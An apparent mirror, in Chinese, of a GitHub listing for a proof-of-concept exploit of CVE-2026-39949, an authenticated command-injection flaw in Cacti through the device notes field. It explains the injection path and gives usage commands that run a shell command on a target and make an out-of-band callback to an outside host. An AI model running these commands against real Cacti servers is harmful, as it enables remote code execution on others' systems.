lukehebe/CVE-2026-39949
GitHub: lukehebe/CVE-2026-39949
针对 Cacti ≤ 1.2.30 认证后 RCE 漏洞(CVE-2026-39949)的 PoC 利用工具,通过 Host 变量注入实现远程代码执行验证。
Stars: 0 | Forks: 0
### CVE-2026-39949:Cacti 通过 Host Variable Injection 实现的认证后远程代码执行
## 摘要
Cacti 中的一个 OS command injection 漏洞允许任何拥有设备和 graph template 创建权限的认证用户在底层服务器上执行任意命令。该缺陷的存在是因为用户可控的 host 元数据字段(特别是设备 notes 字段)在通过 Cacti 的 variable 替换引擎替换到 RRDtool 命令行参数中时,没有经过任何清理或转义。攻击者可以在 notes 字段中注入 shell 元字符,精心构造一个引用 |host_notes| 变量的 graph template,并触发 graph 渲染,从而以 web 服务器用户的身份实现完全的远程代码执行。
## 用法:
```
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --cmd 'id'
```
**OOB 命令执行:**
```
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --oob your.oastify.com
```
标签:Cacti, Go语言工具, PoC, 命令注入, 安全漏洞, 暴力破解, 编程工具, 远程代码执行, 逆向工具